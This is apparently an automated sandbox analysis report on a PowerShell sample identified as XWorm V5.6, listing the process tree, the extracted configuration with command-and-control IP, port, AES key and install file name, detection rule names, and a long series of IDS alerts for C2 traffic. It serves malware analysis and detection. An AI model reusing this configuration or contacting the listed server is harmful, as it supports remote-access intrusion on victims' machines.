Windows
Analysis Report
92.255.57.155.ps1
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 6820 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\92. 255.57.155 .ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6844 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 3716 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 62F170FB07FDBB79CEB7147101406EB8) - RegSvcs.exe (PID: 5252 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) - WerFault.exe (PID: 3736 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 5 252 -s 173 6 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
System Summary |
---|
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-29T09:49:16.560934+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:29.301964+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:30.464963+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:44.402294+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:58.404895+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:49:59.328119+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:03.029819+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:03.964582+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:04.172071+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:04.292081+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:04.455341+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:04.814163+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:05.692558+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:05.902574+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:06.044909+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:06.869260+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:07.045873+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:07.256110+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:07.379455+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:07.569545+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:08.464730+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:08.675163+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:08.803911+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:08.887654+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:10.074005+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:10.417934+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:10.715280+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:10.868985+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:10.967271+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:11.520798+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:11.611605+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:12.549466+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:12.759741+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:12.874435+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:13.089706+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:13.204806+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:13.342990+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:13.414813+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:13.545363+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:14.605324+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:14.815830+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:14.874751+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:15.026044+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:15.147035+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:16.090356+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:16.527221+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:16.737455+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:16.796176+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:17.067356+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:17.405988+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:17.529253+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:18.574130+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:18.784637+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:18.904468+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:19.263348+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:20.809032+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:21.047340+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:21.496954+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:21.539001+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:21.791442+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:22.413793+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.032242+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.218153+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.362255+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.483258+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.651202+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:23.770698+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:24.337402+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:24.590080+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:24.826185+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:24.920019+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:25.039575+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:25.410895+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:25.454605+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:25.735223+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:26.542763+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:26.795033+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:27.005261+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:27.431716+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:27.729998+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:27.984051+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:28.349203+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:28.647855+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:28.845282+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:28.964601+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.055428+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.175074+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.265968+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.385226+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:29.505083+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:30.267599+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:30.933815+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:31.144316+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:31.383523+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:31.503069+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:31.635012+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:32.351876+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:34.011259+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:34.370884+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:34.691200+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:34.820320+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:34.910856+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:36.402691+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:36.636705+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:37.028153+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:37.264888+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:37.358341+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:37.718652+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:38.077885+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:38.855270+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:39.065640+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:39.211108+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:39.318908+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:39.421416+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:39.574975+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:40.560743+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:40.797191+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:40.916824+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:41.419394+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:41.631321+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:42.699143+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:42.909380+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:43.055664+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:43.306431+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:43.639295+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:44.266999+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:44.477066+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:44.920968+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:45.944505+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:46.242158+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:46.859638+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:47.322907+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:47.401350+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:47.533207+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:48.162862+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:48.793146+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:49.003677+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:49.123194+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:49.453859+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:50.636899+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:50.892561+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:51.509171+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:51.983669+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:52.619465+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:52.796384+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:53.125986+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:53.700978+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:54.777634+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:55.030677+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:55.269249+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:55.522807+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:55.605116+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:55.902793+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:56.714702+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:56.925186+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:57.178951+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:57.255964+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:58.683506+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:59.355347+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:59.996072+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:50:59.996115+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:00.433841+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:00.730443+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:01.052735+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:01.222593+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:01.383482+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:01.851191+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:02.142201+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:02.465885+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:02.630456+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:02.905722+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:03.665531+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
2024-12-29T09:51:03.875638+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.155 | 4411 | 192.168.2.4 | 49730 | TCP |
